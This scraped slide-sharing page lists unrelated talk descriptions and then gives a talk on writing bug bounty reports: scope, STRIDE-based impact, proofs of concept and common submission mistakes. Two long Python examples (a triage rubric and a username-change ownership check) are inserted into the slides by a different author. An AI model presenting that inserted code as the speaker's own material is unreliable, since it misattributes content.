Bug bounty programs are all about getting good guys who think like bad guys to help you protect your business from application security flaws. In this workshop Casey Ellis and Chris Raethke from Bugcrowd, The Bug Bounty Company, will go through some of the tricks and tips of setting up and running a successful bug bounty program.
Trusted Execution Environment for Decentralized Process Mining, by LucaBarbaro3
Presentation of the paper "Trusted Execution Environment for Decentralized Process Mining" given during the CAiSE 2024 Conference in Cyprus on June 7, 2024.
Generating privacy-protected synthetic data using Secludy and Milvus, by Zilliz
During this demo, the founders of Secludy will demonstrate how their system utilizes Milvus to store and manipulate embeddings for generating privacy-protected synthetic data. Their approach not only maintains the confidentiality of the original data but also enhances the utility and scalability of LLMs under privacy constraints. Attendees, including machine learning engineers, data scientists, and data managers, will witness first-hand how Secludy's integration with Milvus empowers organizations to harness the power of LLMs securely and efficiently.
Dive into the realm of operating systems (OS) with Pravash Chandra Das, a seasoned Digital Forensic Analyst, as your guide. 🚀 This comprehensive presentation illuminates the core concepts, types, and evolution of OS, essential for understanding modern computing landscapes.
Beginning with the foundational definition, Das clarifies the pivotal role of OS as system software orchestrating hardware resources, software applications, and user interactions. Through succinct descriptions, he delineates the diverse types of OS, from single-user, single-task environments like early MS-DOS iterations, to multi-user, multi-tasking systems exemplified by modern Linux distributions.
Crucial components like the kernel and shell are dissected, highlighting their indispensable functions in resource management and user interface interaction. Das elucidates how the kernel acts as the central nervous system, orchestrating process scheduling, memory allocation, and device management. Meanwhile, the shell serves as the gateway for user commands, bridging the gap between human input and machine execution. 💻
The narrative then shifts to a captivating exploration of prominent desktop OSs, Windows, macOS, and Linux. Windows, with its globally ubiquitous presence and user-friendly interface, emerges as a cornerstone in personal computing history. macOS, lauded for its sleek design and seamless integration with Apple's ecosystem, stands as a beacon of stability and creativity. Linux, an open-source marvel, offers unparalleled flexibility and security, revolutionizing the computing landscape. 🖥️
Moving to the realm of mobile devices, Das unravels the dominance of Android and iOS. Android's open-source ethos fosters a vibrant ecosystem of customization and innovation, while iOS boasts a seamless user experience and robust security infrastructure. Meanwhile, discontinued platforms like Symbian and Palm OS evoke nostalgia for their pioneering roles in the smartphone revolution.
The journey concludes with a reflection on the ever-evolving landscape of OS, underscored by the emergence of real-time operating systems (RTOS) and the persistent quest for innovation and efficiency. As technology continues to shape our world, understanding the foundations and evolution of operating systems remains paramount. Join Pravash Chandra Das on this illuminating journey through the heart of computing. 🌟
Main news related to the CCS TSI 2023 (2023/1695), by Jakub Marek
An English 🇬🇧 translation of the presentation for the speech I gave about the main changes brought by CCS TSI 2023 at the biggest Czech conference on communications and signalling systems on railways, held in the Clarion Hotel Olomouc from 7th to 9th November 2023 (konferenceszt.cz). It was attended by around 500 participants and 200 online followers.
The original Czech 🇨🇿 version of the presentation can be found here: https://www.slideshare.net/slideshow/hlavni-novinky-souvisejici-s-ccs-tsi-2023-2023-1695/269688092 .
The videorecording (in Czech) from the presentation is available here: https://youtu.be/WzjJWm4IyPk?si=SImb06tuXGb30BEH .
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf, by Malak Abu Hammad
Discover how MongoDB Atlas and vector search technology can revolutionize your application's search capabilities. This comprehensive presentation covers:
* What is Vector Search?
* Importance and benefits of vector search
* Practical use cases across various industries
* Step-by-step implementation guide
* Live demos with code snippets
* Enhancing LLM capabilities with vector search
* Best practices and optimization strategies
Perfect for developers, AI enthusiasts, and tech leaders. Learn how to leverage MongoDB Atlas to deliver highly relevant, context-aware search results, transforming your data retrieval process. Stay ahead in tech innovation and maximize the potential of your applications.
#MongoDB #VectorSearch #AI #SemanticSearch #TechInnovation #DataScience #LLM #MachineLearning #SearchTechnology
Best 20 SEO Techniques To Improve Website Visibility In SERP, by Pixlogix Infotech
Boost your website's visibility with proven SEO techniques! Our latest blog dives into essential strategies to enhance your online presence, increase traffic, and rank higher on search engines. From keyword optimization to quality content creation, learn how to make your site stand out in the crowded digital landscape. Discover actionable tips and expert insights to elevate your SEO game.
Building Production Ready Search Pipelines with Spark and Milvus, by Zilliz
Spark is the widely used ETL tool for processing, indexing and ingesting data to serving stack for search. Milvus is the production-ready open-source vector database. In this talk we will show how to use Spark to process unstructured data to extract vector representations, and push the vectors to Milvus vector database for search serving.
Taking AI to the Next Level in Manufacturing.pdf, by ssuserfac0301
Read Taking AI to the Next Level in Manufacturing to gain insights on AI adoption in the manufacturing industry, such as:
1. How quickly AI is being implemented in manufacturing.
2. Which barriers stand in the way of AI adoption.
3. How data quality and governance form the backbone of AI.
4. Organizational processes and structures that may inhibit effective AI adoption.
6. Ideas and approaches to help build your organization's AI strategy.
Driving Business Innovation: Latest Generative AI Advancements & Success StorySafe Software
Are you ready to revolutionize how you handle data? Join us for a webinar where we’ll bring you up to speed with the latest advancements in Generative AI technology and discover how leveraging FME with tools from giants like Google Gemini, Amazon, and Microsoft OpenAI can supercharge your workflow efficiency.
During the hour, we’ll take you through:
Guest Speaker Segment with Hannah Barrington: Dive into the world of dynamic real estate marketing with Hannah, the Marketing Manager at Workspace Group. Hear firsthand how their team generates engaging descriptions for thousands of office units by integrating diverse data sources—from PDF floorplans to web pages—using FME transformers, like OpenAIVisionConnector and AnthropicVisionConnector. This use case will show you how GenAI can streamline content creation for marketing across the board.
Ollama Use Case: Learn how Scenario Specialist Dmitri Bagh has utilized Ollama within FME to input data, create custom models, and enhance security protocols. This segment will include demos to illustrate the full capabilities of FME in AI-driven processes.
Custom AI Models: Discover how to leverage FME to build personalized AI models using your data. Whether it’s populating a model with local data for added security or integrating public AI tools, find out how FME facilitates a versatile and secure approach to AI.
We’ll wrap up with a live Q&A session where you can engage with our experts on your specific use cases, and learn more about optimizing your data workflows with AI.
This webinar is ideal for professionals seeking to harness the power of AI within their data management systems while ensuring high levels of customization and security. Whether you're a novice or an expert, gain actionable insights and strategies to elevate your data processes. Join us to see how FME and AI can revolutionize how you work with data!
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUpanagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-und-domino-lizenzkostenreduzierung-in-der-welt-von-dlau/
DLAU und die Lizenzen nach dem CCB- und CCX-Modell sind für viele in der HCL-Community seit letztem Jahr ein heißes Thema. Als Notes- oder Domino-Kunde haben Sie vielleicht mit unerwartet hohen Benutzerzahlen und Lizenzgebühren zu kämpfen. Sie fragen sich vielleicht, wie diese neue Art der Lizenzierung funktioniert und welchen Nutzen sie Ihnen bringt. Vor allem wollen Sie sicherlich Ihr Budget einhalten und Kosten sparen, wo immer möglich. Das verstehen wir und wir möchten Ihnen dabei helfen!
Wir erklären Ihnen, wie Sie häufige Konfigurationsprobleme lösen können, die dazu führen können, dass mehr Benutzer gezählt werden als nötig, und wie Sie überflüssige oder ungenutzte Konten identifizieren und entfernen können, um Geld zu sparen. Es gibt auch einige Ansätze, die zu unnötigen Ausgaben führen können, z. B. wenn ein Personendokument anstelle eines Mail-Ins für geteilte Mailboxen verwendet wird. Wir zeigen Ihnen solche Fälle und deren Lösungen. Und natürlich erklären wir Ihnen das neue Lizenzmodell.
Nehmen Sie an diesem Webinar teil, bei dem HCL-Ambassador Marc Thomas und Gastredner Franz Walder Ihnen diese neue Welt näherbringen. Es vermittelt Ihnen die Tools und das Know-how, um den Überblick zu bewahren. Sie werden in der Lage sein, Ihre Kosten durch eine optimierte Domino-Konfiguration zu reduzieren und auch in Zukunft gering zu halten.
Diese Themen werden behandelt
- Reduzierung der Lizenzkosten durch Auffinden und Beheben von Fehlkonfigurationen und überflüssigen Konten
- Wie funktionieren CCB- und CCX-Lizenzen wirklich?
- Verstehen des DLAU-Tools und wie man es am besten nutzt
- Tipps für häufige Problembereiche, wie z. B. Team-Postfächer, Funktions-/Testbenutzer usw.
- Praxisbeispiele und Best Practices zum sofortigen Umsetzen
Slide 2
whoami
• Senior Director of a Red Team
• PSIRT Case Manager
• Data Analyst
• Internet Crime Investigator
• Behavioral Psychologist
• Lawful Good
@kym_possible
Slide 3
Out of Scope earns no $$
Step 1: Read The Bounty Brief
https://blog.bugcrowd.com/protip-read-the-bounty-brief/
https://blog.bugcrowd.com/public-disclosure-policy-2016
https://forum.bugcrowd.com/t/in-scope-and-public-disclosure/933
Slide 4
Step 2: Understand the Impact
Knowing what kind of vulnerability you've found is important. Communicating the impact of that vulnerability in your submission is even more important.
Impact is what drives severity and prioritization decisions. Severity is what determines how much you get paid out.
STRIDE Model
• Spoofing
• Tampering
• Repudiation
• Information Disclosure
• DoS
• Elevation of Privilege
https://forum.bugcrowd.com/t/writing-a-bug-report-attack-scenario-and-impact-are-key/640
Slide 5
Example: Why Impact > Vuln Type
Submission:
Create a $APPLICATION account.
Go to the dashboard and click on $FUNCTIONALITY.
Enter all the details.
There is a parameter called $NAME at the end of $FUNCTIONALITY.
Enter the JavaScript payload and you can see the popup.
This is a valid XSS vulnerability that results in elevation of privilege, but it is very low priority to fix. Why?
The attacker has to social engineer the victim into installing the code; this requires significant victim interaction and is not remotely exploitable.
Once the cookie is stolen, the attacker can only exploit that one victim; the attacker has to exploit each victim individually. The vulnerability does not affect multiple users or the system integrity.
Slide 6
Step 3: POC|GTFO
Getting a scan result isn't enough.
Finding an out-of-date library with known CVEs isn't enough.
You have to validate that the application is actually exploitable. BUT BE CAREFUL: don't take down an app or pivot to compromise data. If you ever question "should I try to exploit this", submit the bug without a POC and ask.
Share POC videos and code samples SECURELY (i.e. don't use YouTube).
Explain the Attack Scenario:
• Attacker does X
• Victim does Y (where Y may be "nothing")
• Attacker can now do Z
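To make the reasoning of Steps 2 and 3 concrete, here is an added example (not code from the presentation or from Bugcrowd) that encodes the STRIDE categories and the "Attacker does X / Victim does Y / Attacker can now do Z" structure as a small triage rubric. The priority labels, the four weighting factors (taken from the self-XSS example on slide 5) and the sample submissions are my own assumptions, modelled on that example and on the mistakes the later slides describe.

```python
"""Impact-driven triage rubric for bounty submissions (added example).

Not code from the presentation or from Bugcrowd. STRIDE and the X/Y/Z
attack-scenario structure come from the slides; labels, weights and the
sample submissions below are assumptions made for illustration.
"""
from __future__ import annotations

from dataclasses import dataclass
from enum import Enum


class Stride(Enum):
    SPOOFING = "Spoofing"
    TAMPERING = "Tampering"
    REPUDIATION = "Repudiation"
    INFORMATION_DISCLOSURE = "Information Disclosure"
    DOS = "DoS"
    ELEVATION_OF_PRIVILEGE = "Elevation of Privilege"


@dataclass
class Submission:
    title: str
    category: Stride
    attacker_does: str            # "Attacker does X"
    victim_does: str              # "Victim does Y"; "nothing" means no interaction
    attacker_gains: str           # "Attacker can now do Z"
    remotely_exploitable: bool
    affects_multiple_users: bool
    affects_system_integrity: bool
    requires_other_vuln: bool = False  # "suppose the browser is already compromised"
    has_poc: bool = False


def missing_scenario_parts(sub: Submission) -> list[str]:
    """Name the X/Y/Z parts left blank, as in an incomplete report."""
    parts = {
        "attacker_does": sub.attacker_does,
        "victim_does": sub.victim_does,
        "attacker_gains": sub.attacker_gains,
    }
    return [name for name, text in parts.items() if not text.strip()]


def triage(sub: Submission) -> tuple[str, list[str]]:
    """Return (priority label, reasons); the label scale is an assumption."""
    missing = missing_scenario_parts(sub)
    if missing:
        return "Needs info", ["attack scenario incomplete: " + ", ".join(missing)]
    if sub.requires_other_vuln:  # a hypothetical first vulnerability is assumed
        return "Not rewardable", ["requires a second, theoretical vulnerability"]

    reasons: list[str] = []
    score = 0
    # Each factor the self-XSS slide cites as lowering priority costs a point.
    if sub.remotely_exploitable:
        score += 1
    else:
        reasons.append("not remotely exploitable")
    if sub.victim_does.strip().lower() == "nothing":
        score += 1
    else:
        reasons.append("needs victim interaction: " + sub.victim_does)
    if sub.affects_multiple_users:
        score += 1
    else:
        reasons.append("only one victim at a time")
    if sub.affects_system_integrity:
        score += 1
    else:
        reasons.append("system integrity not affected")
    if not sub.has_poc:  # Step 3: a scan result alone is not validation
        reasons.append("no POC: ask the researcher to validate exploitability")
    return ["Low", "Low", "Medium", "High", "Critical"][score], reasons


# Constructed sample submissions that mirror the slides (not real reports).
SELF_XSS = Submission(
    "XSS in $NAME parameter", Stride.ELEVATION_OF_PRIVILEGE,
    attacker_does="crafts a JavaScript payload",
    victim_does="pastes the payload into their own $NAME field",
    attacker_gains="runs script in that one victim's session",
    remotely_exploitable=False, affects_multiple_users=False,
    affects_system_integrity=False, has_poc=True,
)
UNAUTH_RENAME = Submission(  # the rewardable variant of the username case
    "Change any user's username", Stride.TAMPERING,
    attacker_does="submits a rename request naming another user's id",
    victim_does="nothing",
    attacker_gains="renames any account without the owner's involvement",
    remotely_exploitable=True, affects_multiple_users=True,
    affects_system_integrity=False, has_poc=True,
)
PRECONDITION = Submission(  # "suppose the user's browser is compromised"
    "Session theft if the browser is compromised", Stride.SPOOFING,
    attacker_does="reads the session cookie from the compromised browser",
    victim_does="nothing", attacker_gains="acts as the victim",
    remotely_exploitable=True, affects_multiple_users=True,
    affects_system_integrity=False, requires_other_vuln=True,
)
INCOMPLETE = Submission(  # reproduction steps leave Y and Z unstated
    "Fake account e-mail confirmation", Stride.SPOOFING,
    attacker_does="creates a fake account and changes his e-mail",
    victim_does="", attacker_gains="",
    remotely_exploitable=True, affects_multiple_users=False,
    affects_system_integrity=False,
)

if __name__ == "__main__":
    for sub in (SELF_XSS, UNAUTH_RENAME, PRECONDITION, INCOMPLETE):
        label, why = triage(sub)
        print(f"{sub.title}: {label} ({'; '.join(why) or 'no deductions'})")
```

Run stand-alone it prints one line per sample; the self-XSS case lands on "Low" for exactly the four reasons the slide gives, while a rename of any account with no victim interaction scores "High" because three of the four factors are present.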
Slide 7
Mistakes I've Seen
Scenario 1: The reproduction steps and attack scenario are incomplete and unclear.
Submitted:
An attacker creates a fake account and changes his e-mail. The e-mail confirmation link can now be used to login someone into the fake account and then monitor actions performed by the victim or even interact with him.
Let's break down why that is going to get rejected as invalid:
• An attacker creates a fake account <-- what kind of account? user? do they need to be an admin to do this?
• and changes his e-mail. <-- changes it to what? the victim's email?
• The e-mail confirmation link can now be used <-- by whom?
• to login someone <-- the victim?
• into the fake account <-- why would the victim do this?
• and then monitor actions performed by the victim or even interact with him. <-- so they can view the victim's actions? can they access the victim's account settings without victim interaction?
Slide 8
Mistakes I've Seen
Scenario 2: The submission requires another vulnerability to be exploited first.
If a submission starts with "Suppose I am an attacker and (the user's browser is compromised / I got access to the recovery email option of your $APPLICATION account)", everything that comes next is not exploitable on its own and requires a second, theoretical vulnerability in the application. While in some cases the report may recommend a legitimate security best practice, in most cases those are unrewardable in bounty programs.
Slide 9
Mistakes I've Seen
Scenario 3: The exploit impact is unclear.
Submitted:
An attacker is just required to send an email confirmation link to the victim & he'll be automatically logged into his (attacker's) account. I can then monitor his actions & interact.
OK, this means that the attacker has just compromised themselves by giving the "victim" access to the attacker's account. The victim's account is not in any way compromised, unless the attacker manages to elaborately social engineer the victim into giving up their credentials to the attacker once logged into the attacker's account. But if I can get you to click an email link, that isn't a web application vulnerability the customer can patch.
Slide 10
Mistakes I've Seen
Scenario 4: Not a vulnerability.
Submission:
Application allows its users to change their USERNAME, and there is a big issue: no prevention of account name takeover.
Let's explain:
1. Suppose "Kymberlee" changes their username to Kymberlee1. OK, but the interesting bug is your application is not blacklisting the old username and anyone can take over the old username. And there is also no limit on username changes.
Security risk:
I'm sure every researcher is posting their own Cobalt, HackerOne, Bugcrowd links on social sites and other accounts to show their own rank. But what if, 6 months after posting, the user changed their username to another name? The old link is still not blacklisted and any other fake core researcher can take over the old name.
The ability to change usernames is intended functionality. Now if the attacker can change my username without my involvement, then THAT is a vulnerability to be rewarded and fixed!
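The distinction the slide draws is between intended behaviour (a user renames their own account and the old name becomes free) and a real authorization bug (a rename of someone else's account). As an added example that is not the presentation's or any real application's code, here is a username-change handler with the ownership check that separates the two; the in-memory store, the session model and the username policy are constructed assumptions.

```python
"""Username change with an ownership check (added example).

Not code from the presentation or any real application. The store, session
model and username policy are constructed. As the slide says, releasing the
old name is intended functionality, so it is not blacklisted; the rewardable
bug would be renaming another user's account, which step 1 below prevents.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

USERNAME_RE = re.compile(r"[A-Za-z0-9_]{3,32}")  # assumed policy


class Forbidden(Exception):
    """Requester is not the owner of the account being renamed."""


class Conflict(Exception):
    """Requested username is already held by another account."""


@dataclass
class UserStore:
    usernames: dict[int, str] = field(default_factory=dict)  # user_id -> username
    # (actor, target, old, new): an audit trail so a rename cannot be repudiated
    audit: list[tuple[int, int, str, str]] = field(default_factory=list)

    def holder_of(self, username: str) -> int | None:
        """Case-insensitive lookup so 'Kymberlee' and 'kymberlee' cannot coexist."""
        wanted = username.lower()
        for uid, name in self.usernames.items():
            if name.lower() == wanted:
                return uid
        return None


def change_username(store: UserStore, session_user_id: int,
                    target_user_id: int, new_username: str) -> str:
    """Rename target_user_id to new_username and return the released old name."""
    # 1. Authorization: the identity from the authenticated session must be the
    #    account being renamed. Trusting a user id taken from the request body
    #    instead would let anyone rename any account, which is the bug the slide
    #    says would be rewarded and fixed.
    if session_user_id != target_user_id:
        raise Forbidden(f"user {session_user_id} may not rename user {target_user_id}")
    if target_user_id not in store.usernames:
        raise KeyError(target_user_id)
    # 2. Validation of the new name against the assumed policy
    new = new_username.strip()
    if not USERNAME_RE.fullmatch(new):
        raise ValueError("username must be 3-32 characters of [A-Za-z0-9_]")
    # 3. Uniqueness (renaming to one's own current name is a harmless no-op)
    holder = store.holder_of(new)
    if holder is not None and holder != target_user_id:
        raise Conflict(f"{new!r} is already taken")
    # 4. Apply the change and record who made it
    old = store.usernames[target_user_id]
    store.usernames[target_user_id] = new
    store.audit.append((session_user_id, target_user_id, old, new))
    return old


if __name__ == "__main__":
    store = UserStore({1: "Kymberlee", 2: "mallory"})  # constructed accounts
    print(change_username(store, 1, 1, "Kymberlee1"))    # owner renames: 'Kymberlee'
    try:
        change_username(store, 2, 1, "newname")            # someone else's account
    except Forbidden as exc:
        print("rejected:", exc)
    print(change_username(store, 2, 2, "Kymberlee"))     # old name is free: intended
    print(store.audit)
```

The check in step 1 is the one a triager would look for when a report claims "I can change another user's username": if the handler binds the target account to the session rather than to a client-supplied id, the report describes intended functionality; if it does not, the report describes the tampering bug the slide says gets rewarded.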
Slide 11
TL;DR
• Read the Bounty Brief so you focus on rewardable vulnerabilities
• Communicate Impact – STRIDE model
• Verify findings and provide POC & Attack Scenario
https://forum.bugcrowd.com/t/writing-a-bug-report-attack-scenario-and-impact-are-key/640